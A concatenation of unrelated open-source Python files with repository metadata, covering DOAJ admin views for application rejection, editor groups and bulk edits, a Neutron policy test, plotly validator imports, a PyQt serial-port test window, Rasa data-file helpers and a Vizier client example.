if canned_reason != "":
reasons.append(canned_reason)
if additional_info != "":
reasons.append(additional_info)
if len(reasons) == 0:
abort(400)
reason = " - ".join(reasons)
note = Messages.REJECT_NOTE_WRAPPER.format(editor=current_user.id, note=reason)
applicationService = DOAJ.applicationService()
# retrieve the application and an edit lock on that application
application = None
try:
application, alock = applicationService.application(application_id, lock_application=True, lock_account=current_user._get_current_object())
    except lock.Locked:
abort(409)
# determine if this was a new application or an update request
update_request = application.current_journal is not None
if update_request:
abort(400)
if application.owner is None:
Messages.flash_with_url(Messages.ADMIN__QUICK_REJECT__NO_OWNER, "error")
# redirect the user back to the edit page
return redirect(url_for('.application', application_id=application_id))
# reject the application
old_status = application.application_status
applicationService.reject_application(application, current_user._get_current_object(), note=note)
# send the notification email to the user
if old_status != constants.APPLICATION_STATUS_REJECTED:
eventsSvc = DOAJ.eventsService()
eventsSvc.trigger(models.Event(constants.EVENT_APPLICATION_STATUS, current_user.id, {
"application": application.data,
"old_status": old_status,
"new_status": constants.APPLICATION_STATUS_REJECTED,
"process": constants.PROCESS__QUICK_REJECT,
"note": reason
}))
# sort out some flash messages for the user
flash(note, "success")
msg = Messages.SENT_REJECTED_APPLICATION_EMAIL_TO_OWNER.format(user=application.owner)
flash(msg, "success")
# redirect the user back to the edit page
return redirect(url_for('.application', application_id=application_id))
@blueprint.route("/admin_site_search", methods=["GET"])
@login_required
@ssl_required
def admin_site_search():
#edit_formcontext = formcontext.ManEdBulkEdit()
#edit_form = edit_formcontext.render_template()
edit_formulaic_context = JournalFormFactory.context("bulk_edit")
edit_form = edit_formulaic_context.render_template()
return render_template("admin/admin_site_search.html",
admin_page=True,
edit_form=edit_form)
@blueprint.route("/editor_groups")
@login_required
@ssl_required
def editor_group_search():
return render_template("admin/editor_group_search.html", admin_page=True)
@blueprint.route("/background_jobs")
@login_required
@ssl_required
def background_jobs_search():
return render_template("admin/background_jobs_search.html", admin_page=True)
@blueprint.route("/editor_group", methods=["GET", "POST"])
@blueprint.route("/editor_group/<group_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def editor_group(group_id=None):
if not current_user.has_role("modify_editor_groups"):
abort(401)
# ~~->EditorGroup:Form~~
if request.method == "GET":
form = EditorGroupForm()
if group_id is not None:
eg = models.EditorGroup.pull(group_id)
form.group_id.data = eg.id
form.name.data = eg.name
form.maned.data = eg.maned
form.editor.data = eg.editor
form.associates.data = ",".join(eg.associates)
return render_template("admin/editor_group.html", admin_page=True, form=form)
elif request.method == "POST":
if request.values.get("delete", "false") == "true":
# we have been asked to delete the id
if group_id is None:
# we can only delete things that exist
abort(400)
eg = models.EditorGroup.pull(group_id)
if eg is None:
abort(404)
eg.delete()
# return a json response
resp = make_response(json.dumps({"success" : True}))
resp.mimetype = "application/json"
return resp
# otherwise, we want to edit the content of the form or the object
form = EditorGroupForm(request.form)
if form.validate():
# get the group id from the url or from the request parameters
if group_id is None:
group_id = request.values.get("group_id")
group_id = group_id if group_id != "" else None
# if we have a group id, this is an edit, so get the existing group
if group_id is not None:
eg = models.EditorGroup.pull(group_id)
if eg is None:
abort(404)
else:
eg = models.EditorGroup()
associates = form.associates.data
if associates is not None:
associates = [a.strip() for a in associates.split(",") if a.strip() != ""]
# prep the user accounts with the correct role(s)
            ed = models.Account.pull(form.editor.data)
            if ed is not None:  # guard against deleted accounts, as with associates below
                ed.add_role("editor")
                ed.save()
if associates is not None:
for a in associates:
ae = models.Account.pull(a)
if ae is not None: # If the account has been deleted, pull fails
ae.add_role("associate_editor")
ae.save()
eg.set_name(form.name.data)
eg.set_maned(form.maned.data)
eg.set_editor(form.editor.data)
if associates is not None:
eg.set_associates(associates)
eg.save()
flash("Group was updated - changes may not be reflected below immediately. Reload the page to see the update.", "success")
return redirect(url_for('admin.editor_group_search'))
else:
return render_template("admin/editor_group.html", admin_page=True, form=form)
@blueprint.route("/autocomplete/user")
@login_required
@ssl_required
def user_autocomplete():
q = request.values.get("q")
    s = int(request.values.get("s", 10))
ac = models.Account.autocomplete("id", q, size=s)
# return a json response
resp = make_response(json.dumps(ac))
resp.mimetype = "application/json"
return resp
# Route which returns the associate editor account names within a given editor group
@blueprint.route("/dropdown/eg_associates")
@login_required
@ssl_required
def eg_associates_dropdown():
egn = request.values.get("egn")
eg = models.EditorGroup.pull_by_key("name", egn)
if eg is not None:
editors = [eg.editor]
editors += eg.associates
editors = list(set(editors))
else:
editors = None
# return a json response
resp = make_response(json.dumps(editors))
resp.mimetype = "application/json"
return resp
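# Illustrative response bodies for the dropdown above ("egn" is the group name):
#   ["editor_id", "associate_1", "associate_2"]   when the group exists
#   null                                          when no group matches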
####################################################
## endpoints for bulk edit
class BulkAdminEndpointException(Exception):
pass
@app.errorhandler(BulkAdminEndpointException)
def bulk_admin_endpoints_bad_request(exception):
r = {}
    r['error'] = str(exception)
return make_json_resp(r, status_code=400)
def get_bulk_edit_background_task_manager(doaj_type):
if doaj_type == 'journals':
return journal_bulk_edit.journal_manage
elif doaj_type in ['applications', 'update_requests']:
return suggestion_bulk_edit.suggestion_manage
else:
raise BulkAdminEndpointException('Unsupported DOAJ type - you can currently only bulk edit journals and applications/update_requests.')
def get_query_from_request(payload, doaj_type=None):
q = payload['selection_query']
q = remove_search_limits(q)
q = Query(q)
if doaj_type == "update_requests":
update_request(q)
elif doaj_type == "applications":
not_update_request(q)
return q.as_dict()
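# Illustrative request body shared by the bulk admin endpoints in this module;
# the query below is a placeholder, not a real saved search:
# {
#     "selection_query": {"query": {"match_all": {}}},
#     "dry_run": true
# }
# Individual endpoints require additional fields on top of this, e.g.
# "editor_group", "note" or "application_status".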
@blueprint.route("/<doaj_type>/bulk/assign_editor_group", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_assign_editor_group(doaj_type):
task = get_bulk_edit_background_task_manager(doaj_type)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'editor_group'], error_to_raise=BulkAdminEndpointException)
summary = task(
selection_query=get_query_from_request(payload, doaj_type),
editor_group=payload['editor_group'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/<doaj_type>/bulk/add_note", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_add_note(doaj_type):
task = get_bulk_edit_background_task_manager(doaj_type)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'note'], error_to_raise=BulkAdminEndpointException)
summary = task(
selection_query=get_query_from_request(payload, doaj_type),
note=payload['note'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/edit_metadata", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_edit_journal_metadata():
task = get_bulk_edit_background_task_manager("journals")
payload = get_web_json_payload()
if not "metadata" in payload:
raise BulkAdminEndpointException("key 'metadata' not present in request json")
formdata = MultiDict(payload["metadata"])
formulaic_context = JournalFormFactory.context("bulk_edit")
fc = formulaic_context.processor(formdata=formdata)
if not fc.validate():
msg = "Unable to submit your request due to form validation issues: "
for field in fc.form:
if field.errors:
                msg += field.label.text + " - " + ", ".join(field.errors) + "; "
summary = BackgroundSummary(None, error=msg)
else:
summary = task(
selection_query=get_query_from_request(payload),
dry_run=payload.get('dry_run', True),
**payload["metadata"]
)
return make_json_resp(summary.as_dict(), status_code=200)
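# Illustrative payload for the metadata bulk edit above; the field inside
# "metadata" is an assumption and must match the bulk_edit form definition:
# {
#     "selection_query": {"query": {"match_all": {}}},
#     "dry_run": true,
#     "metadata": {"publisher_name": "Example Publisher"}
# }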
@blueprint.route("/<doaj_type>/bulk/change_status", methods=["POST"])
@login_required
@ssl_required
@write_required()
def applications_bulk_change_status(doaj_type):
if doaj_type not in ["applications", "update_requests"]:
abort(403)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'application_status'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload, doaj_type)
summary = get_bulk_edit_background_task_manager('applications')(
selection_query=q,
application_status=payload['application_status'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/delete", methods=['POST'])
@write_required()
def bulk_journals_delete():
if not current_user.has_role("ultra_bulk_delete"):
abort(403)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_bulk_delete.journal_bulk_delete_manage(
selection_query=q,
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/articles/bulk/delete", methods=['POST'])
@write_required()
def bulk_articles_delete():
if not current_user.has_role("ultra_bulk_delete"):
abort(403)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = article_bulk_delete.article_bulk_delete_manage(
selection_query=q,
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
################################################# | {
"content_hash": "11d87b09a351429e2c016ce620008c82",
"timestamp": "",
"source": "github",
"line_count": 760,
"max_line_length": 278,
"avg_line_length": 35.71578947368421,
"alnum_prop": 0.6473253757736517,
"repo_name": "DOAJ/doaj",
"id": "5e02c11ccd8f6e16513387b91e180c80e19cc515",
"size": "27144",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "portality/view/admin.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2399"
},
{
"name": "Dockerfile",
"bytes": "59"
},
{
"name": "HTML",
"bytes": "483733"
},
{
"name": "JavaScript",
"bytes": "952971"
},
{
"name": "Jinja",
"bytes": "15292"
},
{
"name": "Python",
"bytes": "3195030"
},
{
"name": "SCSS",
"bytes": "75276"
},
{
"name": "Shell",
"bytes": "28415"
}
],
"symlink_target": ""
} |
import os.path
from neutron_lib.api import attributes
from neutron_lib import context
from neutron_lib import fixture
from neutron.api import extensions
from neutron import policy
from neutron.tests import base
TEST_PATH = os.path.dirname(os.path.abspath(__file__))
class APIPolicyTestCase(base.BaseTestCase):
"""
Tests for REST API policy checks. Ideally this would be done against an
environment with an instantiated plugin, but there appears to be problems
with instantiating a plugin against an sqlite environment and as yet, there
is no precedent for running a functional test against an actual database
backend.
"""
api_version = "2.0"
def setUp(self):
super(APIPolicyTestCase, self).setUp()
self.useFixture(fixture.APIDefinitionFixture())
self.extension_path = os.path.abspath(os.path.join(
TEST_PATH, "../../../extensions"))
self.addCleanup(policy.reset)
def _network_definition(self):
return {'name': 'test_network',
'ports': [],
'subnets': [],
'status': 'up',
'admin_state_up': True,
'shared': False,
'tenant_id': 'admin',
'id': 'test_network',
'router:external': True}
def _check_external_router_policy(self, context):
return policy.check(context, 'get_network', self._network_definition())
def test_premature_loading(self):
"""
Verifies that loading policies by way of admin context before
populating extensions and extending the resource map results in
networks with router:external is true being invisible to regular
tenants.
"""
extension_manager = extensions.ExtensionManager(self.extension_path)
admin_context = context.get_admin_context()
tenant_context = context.Context('test_user', 'test_tenant_id', False)
extension_manager.extend_resources(self.api_version,
attributes.RESOURCES)
self.assertTrue(self._check_external_router_policy(admin_context))
self.assertFalse(self._check_external_router_policy(tenant_context))
def test_proper_load_order(self):
"""
Verifies that loading policies by way of admin context after
populating extensions and extending the resource map results in
networks with router:external are visible to regular tenants.
"""
policy.reset()
extension_manager = extensions.ExtensionManager(self.extension_path)
extension_manager.extend_resources(self.api_version,
attributes.RESOURCES)
policy.init()
admin_context = context.get_admin_context()
tenant_context = context.Context('test_user', 'test_tenant_id', False)
self.assertTrue(self._check_external_router_policy(admin_context))
self.assertTrue(self._check_external_router_policy(tenant_context))
| {
"content_hash": "e0154389717597531b26247f8d28fff5",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 79,
"avg_line_length": 40.373333333333335,
"alnum_prop": 0.6459709379128138,
"repo_name": "huntxu/neutron",
"id": "6b8b2d58e31ef1b83043ab7ad630dc7813ba02b9",
"size": "3661",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "neutron/tests/functional/api/test_policies.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Mako",
"bytes": "1047"
},
{
"name": "Python",
"bytes": "11111676"
},
{
"name": "Shell",
"bytes": "37514"
}
],
"symlink_target": ""
} |
import sys
from typing import TYPE_CHECKING
if sys.version_info < (3, 7) or TYPE_CHECKING:
from ._zsrc import ZsrcValidator
from ._zmin import ZminValidator
from ._zmid import ZmidValidator
from ._zmax import ZmaxValidator
from ._zauto import ZautoValidator
from ._z import ZValidator
from ._visible import VisibleValidator
from ._unselected import UnselectedValidator
from ._uirevision import UirevisionValidator
from ._uid import UidValidator
from ._textsrc import TextsrcValidator
from ._text import TextValidator
from ._subplot import SubplotValidator
from ._stream import StreamValidator
from ._showscale import ShowscaleValidator
from ._showlegend import ShowlegendValidator
from ._selectedpoints import SelectedpointsValidator
from ._selected import SelectedValidator
from ._reversescale import ReversescaleValidator
from ._name import NameValidator
from ._metasrc import MetasrcValidator
from ._meta import MetaValidator
from ._marker import MarkerValidator
from ._locationssrc import LocationssrcValidator
from ._locations import LocationsValidator
from ._legendwidth import LegendwidthValidator
from ._legendrank import LegendrankValidator
from ._legendgrouptitle import LegendgrouptitleValidator
from ._legendgroup import LegendgroupValidator
from ._idssrc import IdssrcValidator
from ._ids import IdsValidator
from ._hovertextsrc import HovertextsrcValidator
from ._hovertext import HovertextValidator
from ._hovertemplatesrc import HovertemplatesrcValidator
from ._hovertemplate import HovertemplateValidator
from ._hoverlabel import HoverlabelValidator
from ._hoverinfosrc import HoverinfosrcValidator
from ._hoverinfo import HoverinfoValidator
from ._geojson import GeojsonValidator
from ._featureidkey import FeatureidkeyValidator
from ._customdatasrc import CustomdatasrcValidator
from ._customdata import CustomdataValidator
from ._colorscale import ColorscaleValidator
from ._colorbar import ColorbarValidator
from ._coloraxis import ColoraxisValidator
from ._below import BelowValidator
from ._autocolorscale import AutocolorscaleValidator
else:
from _plotly_utils.importers import relative_import
__all__, __getattr__, __dir__ = relative_import(
__name__,
[],
[
"._zsrc.ZsrcValidator",
"._zmin.ZminValidator",
"._zmid.ZmidValidator",
"._zmax.ZmaxValidator",
"._zauto.ZautoValidator",
"._z.ZValidator",
"._visible.VisibleValidator",
"._unselected.UnselectedValidator",
"._uirevision.UirevisionValidator",
"._uid.UidValidator",
"._textsrc.TextsrcValidator",
"._text.TextValidator",
"._subplot.SubplotValidator",
"._stream.StreamValidator",
"._showscale.ShowscaleValidator",
"._showlegend.ShowlegendValidator",
"._selectedpoints.SelectedpointsValidator",
"._selected.SelectedValidator",
"._reversescale.ReversescaleValidator",
"._name.NameValidator",
"._metasrc.MetasrcValidator",
"._meta.MetaValidator",
"._marker.MarkerValidator",
"._locationssrc.LocationssrcValidator",
"._locations.LocationsValidator",
"._legendwidth.LegendwidthValidator",
"._legendrank.LegendrankValidator",
"._legendgrouptitle.LegendgrouptitleValidator",
"._legendgroup.LegendgroupValidator",
"._idssrc.IdssrcValidator",
"._ids.IdsValidator",
"._hovertextsrc.HovertextsrcValidator",
"._hovertext.HovertextValidator",
"._hovertemplatesrc.HovertemplatesrcValidator",
"._hovertemplate.HovertemplateValidator",
"._hoverlabel.HoverlabelValidator",
"._hoverinfosrc.HoverinfosrcValidator",
"._hoverinfo.HoverinfoValidator",
"._geojson.GeojsonValidator",
"._featureidkey.FeatureidkeyValidator",
"._customdatasrc.CustomdatasrcValidator",
"._customdata.CustomdataValidator",
"._colorscale.ColorscaleValidator",
"._colorbar.ColorbarValidator",
"._coloraxis.ColoraxisValidator",
"._below.BelowValidator",
"._autocolorscale.AutocolorscaleValidator",
],
)
| {
"content_hash": "ad4985dbe2b0fa85e0cfd324f5e5053a",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 60,
"avg_line_length": 42.35514018691589,
"alnum_prop": 0.6734333627537511,
"repo_name": "plotly/plotly.py",
"id": "6bf73df4f7e3e402a95193794e554f7abe6116e3",
"size": "4532",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/choroplethmapbox/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
} |
from pyqtgraph.Qt import QtCore
import pyqtgraph as pg
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
import sys
import serial
pg.setConfigOptions(antialias=True)
class SerialPort:
    """ Serial Port Widget """
    def __init__(self, layout):
        if not isinstance(layout, pg.LayoutWidget):
            raise ValueError("layout must be a pg.LayoutWidget")
        self.layout = layout
        self.layout.addLabel("Port")

    def set_timer(self, interval_ms=1000):
        # Minimal stub so the test window below can run; the actual serial
        # polling logic is not implemented in this test script.
        self.timer = QtCore.QTimer()
        self.timer.start(interval_ms)
if __name__ == "__main__":
class MainWindow(QMainWindow):
def __init__(self,*args,**kwargs):
super(MainWindow,self).__init__(*args,**kwargs)
self.setWindowTitle("Main Test Window")
layout = pg.LayoutWidget()
#layout.addLabel("Test",0,0)
self.SerialPort = SerialPort(layout)
#layout.addWidget(self.SerialPort)
            # pg.LayoutWidget is itself a QWidget, so use it directly as the
            # central widget (QWidget.setLayout expects a QLayout, not a widget).
            self.setCentralWidget(layout)
self.setGeometry(200,200,300,300)
self.SerialPort.set_timer()
app = QApplication(sys.argv)
#window = SensorType()
window = MainWindow()
window.show()
app.exec_() | {
"content_hash": "79ef23a61e44b1f7566e30831dd45251",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 59,
"avg_line_length": 21.76271186440678,
"alnum_prop": 0.5630841121495327,
"repo_name": "MCasari-PMEL/EDD-ICMGUI",
"id": "8cff230e6776ebf6129cc948a120f0605801821f",
"size": "1284",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/serplot.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "80531"
}
],
"symlink_target": ""
} |
import os
import shutil
import tempfile
import uuid
from pathlib import Path
from typing import Text, Optional, Union, List, Callable, Set, Iterable
YAML_FILE_EXTENSIONS = [".yml", ".yaml"]
JSON_FILE_EXTENSIONS = [".json"]
TRAINING_DATA_EXTENSIONS = set(JSON_FILE_EXTENSIONS + YAML_FILE_EXTENSIONS)
def yaml_file_extension() -> Text:
"""Return YAML file extension."""
return YAML_FILE_EXTENSIONS[0]
def is_likely_yaml_file(file_path: Union[Text, Path]) -> bool:
"""Check if a file likely contains yaml.
    Args:
file_path: path to the file
Returns:
`True` if the file likely contains data in yaml format, `False` otherwise.
"""
return Path(file_path).suffix in set(YAML_FILE_EXTENSIONS)
def is_likely_json_file(file_path: Text) -> bool:
"""Check if a file likely contains json.
    Args:
file_path: path to the file
Returns:
`True` if the file likely contains data in json format, `False` otherwise.
"""
return Path(file_path).suffix in set(JSON_FILE_EXTENSIONS)
def get_core_directory(paths: Optional[Union[Text, List[Text]]]) -> Text:
"""Recursively collects all Core training files from a list of paths.
Args:
paths: List of paths to training files or folders containing them.
Returns:
Path to temporary directory containing all found Core training files.
"""
from rasa.shared.core.training_data.story_reader.yaml_story_reader import (
YAMLStoryReader,
)
core_files = get_data_files(paths, YAMLStoryReader.is_stories_file)
return _copy_files_to_new_dir(core_files)
def get_nlu_directory(paths: Optional[Union[Text, List[Text]]]) -> Text:
"""Recursively collects all NLU training files from a list of paths.
Args:
paths: List of paths to training files or folders containing them.
Returns:
Path to temporary directory containing all found NLU training files.
"""
nlu_files = get_data_files(paths, is_nlu_file)
return _copy_files_to_new_dir(nlu_files)
def get_data_files(
paths: Optional[Union[Text, List[Text]]], filter_predicate: Callable[[Text], bool]
) -> List[Text]:
"""Recursively collects all training files from a list of paths.
Args:
paths: List of paths to training files or folders containing them.
filter_predicate: property to use when filtering the paths, e.g. `is_nlu_file`.
Returns:
Paths of training data files.
"""
data_files = set()
if paths is None:
paths = []
elif isinstance(paths, str):
paths = [paths]
for path in set(paths):
if not path:
continue
if is_valid_filetype(path):
if filter_predicate(path):
data_files.add(os.path.abspath(path))
else:
new_data_files = _find_data_files_in_directory(path, filter_predicate)
data_files.update(new_data_files)
return sorted(data_files)
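# Usage sketch (illustrative): collect every NLU training file under "data/",
# the same filtering step get_nlu_directory() performs before copying files
# into a temporary directory.
#   nlu_files = get_data_files(["data"], is_nlu_file)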
def _find_data_files_in_directory(
directory: Text, filter_property: Callable[[Text], bool]
) -> Set[Text]:
filtered_files = set()
for root, _, files in os.walk(directory, followlinks=True):
# we sort the files here to ensure consistent order for repeatable training
# results
for f in sorted(files):
full_path = os.path.join(root, f)
if not is_valid_filetype(full_path):
continue
if filter_property(full_path):
filtered_files.add(full_path)
return filtered_files
def is_valid_filetype(path: Union[Path, Text]) -> bool:
"""Checks if given file has a supported extension.
Args:
path: Path to the source file.
Returns:
        `True` if the given file has a supported extension, `False` otherwise.
"""
return Path(path).is_file() and Path(path).suffix in TRAINING_DATA_EXTENSIONS
def is_nlu_file(file_path: Text) -> bool:
"""Checks if a file is a Rasa compatible nlu file.
Args:
file_path: Path of the file which should be checked.
Returns:
`True` if it's a nlu file, otherwise `False`.
"""
from rasa.shared.nlu.training_data import loading as nlu_loading
return nlu_loading.guess_format(file_path) != nlu_loading.UNK
def is_config_file(file_path: Text) -> bool:
"""Checks whether the given file path is a Rasa config file.
Args:
file_path: Path of the file which should be checked.
Returns:
`True` if it's a Rasa config file, otherwise `False`.
"""
file_name = os.path.basename(file_path)
return file_name in ["config.yml", "config.yaml"]
def _copy_files_to_new_dir(files: Iterable[Text]) -> Text:
directory = tempfile.mkdtemp()
for f in files:
# makes sure files do not overwrite each other, hence the prefix
unique_prefix = uuid.uuid4().hex
unique_file_name = unique_prefix + "_" + os.path.basename(f)
shutil.copy2(f, os.path.join(directory, unique_file_name))
return directory
| {
"content_hash": "56e082ee79929999d2857f2cb2082bb6",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 87,
"avg_line_length": 28.942528735632184,
"alnum_prop": 0.6503177124702144,
"repo_name": "RasaHQ/rasa_nlu",
"id": "ffabb6923725d28ad8ee22e06bfb24258fb68338",
"size": "5036",
"binary": false,
"copies": "1",
"ref": "refs/heads/emptystring_10504",
"path": "rasa/shared/data.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "705"
},
{
"name": "HTML",
"bytes": "3462"
},
{
"name": "Makefile",
"bytes": "1044"
},
{
"name": "Python",
"bytes": "1467067"
},
{
"name": "Shell",
"bytes": "941"
}
],
"symlink_target": ""
} |
"""Example of a Vizier Client, which can be run on multiple machines.
For distributed cases, this is meant to be used after the Vizier Server (see
run_vizier_server.py`) has been launched and provided an address to connect to.
Example of a launch command:
```
python run_vizier_client.py --address="localhost:[PORT]"
```
where `address` was provided by the server.
If not provided, the Vizier Server will be created locally, which still allows
parallelization via multithreading, but will not be able to coordinate jobs
across different machines.
"""
from typing import Sequence
from absl import app
from absl import flags
from absl import logging
from vizier.service import clients
from vizier.service import pyvizier as vz
flags.DEFINE_string(
'address', clients.NO_ENDPOINT,
"Address of the Vizier Server which will be used by this demo. Should be of the form e.g. 'localhost:6006' if running on the same machine, or `[IP]:[PORT]` if running on a remote machine. If unset, a local Vizier server will be created inside this process."
)
flags.DEFINE_integer(
'max_num_iterations', 10,
'Maximum number of possible iterations / calls to get suggestions.')
flags.DEFINE_integer(
'suggestion_count', 5,
'Number of suggestions to evaluate per iteration. Useful for batched evaluations.'
)
flags.DEFINE_boolean(
'multiobjective', True,
'Whether to demonstrate multiobjective or single-objective capabilities and API.'
)
FLAGS = flags.FLAGS
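# Illustrative invocation combining the flags above (the address is a
# placeholder for wherever run_vizier_server.py is listening):
#   python run_vizier_client.py --address="10.0.0.5:6006" \
#     --max_num_iterations=20 --suggestion_count=2 --multiobjective=False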
def evaluate_trial(trial: vz.Trial) -> vz.Measurement:
"""Dummy evaluator used as an example."""
learning_rate = trial.parameters.get_value('learning_rate')
num_layers = trial.parameters.get_value('num_layers')
m = vz.Measurement()
m.metrics = {'accuracy': learning_rate * num_layers} # dummy accuracy
if FLAGS.multiobjective:
m.metrics['latency'] = 0.5 * num_layers
return m
def main(argv: Sequence[str]) -> None:
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if FLAGS.address == clients.NO_ENDPOINT:
logging.info(
'You did not specify the server address. The Vizier Service will be created locally.'
)
else:
# Set address.
clients.environment_variables.service_endpoint = FLAGS.address
study_config = vz.StudyConfig() # Search space, metrics, and algorithm.
root = study_config.search_space.root
root.add_float_param(
'learning_rate',
min_value=1e-4,
max_value=1e-2,
scale_type=vz.ScaleType.LOG)
root.add_int_param('num_layers', min_value=1, max_value=5)
study_config.metric_information.append(
vz.MetricInformation(
name='accuracy',
goal=vz.ObjectiveMetricGoal.MAXIMIZE,
min_value=0.0,
max_value=1.0))
if FLAGS.multiobjective:
# No need to specify min/max values.
study_config.metric_information.append(
vz.MetricInformation(
name='latency', goal=vz.ObjectiveMetricGoal.MINIMIZE))
if FLAGS.multiobjective:
study_config.algorithm = vz.Algorithm.NSGA2
else:
study_config.algorithm = vz.Algorithm.EMUKIT_GP_EI
study = clients.Study.from_study_config(
study_config, owner='my_name', study_id='cifar10')
logging.info('Client created with study name: %s', study.resource_name)
for _ in range(FLAGS.max_num_iterations):
# Evaluate the suggestion(s) and report the results to Vizier.
trials = study.suggest(count=FLAGS.suggestion_count)
for trial in trials:
materialized_trial = trial.materialize()
measurement = evaluate_trial(materialized_trial)
trial.complete(measurement)
logging.info('Trial %d completed with metrics: %s', trial.id,
measurement.metrics)
optimal_trials = study.optimal_trials()
for optimal_trial in optimal_trials:
optimal_trial = optimal_trial.materialize(include_all_measurements=True)
logging.info(
'Pareto-optimal trial found so far has parameters %s and metrics %s',
optimal_trial.parameters, optimal_trial.final_measurement.metrics)
if __name__ == '__main__':
app.run(main)
| {
"content_hash": "bd28e8ee14ff6ccc7f6f89709d8ceadc",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 261,
"avg_line_length": 34.63559322033898,
"alnum_prop": 0.7112796672375826,
"repo_name": "google/vizier",
"id": "747bfe3c819e4c0205adbabaf6e7ba59eb31efac",
"size": "4663",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "demos/run_vizier_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1282546"
},
{
"name": "Shell",
"bytes": "2440"
}
],
"symlink_target": ""
} |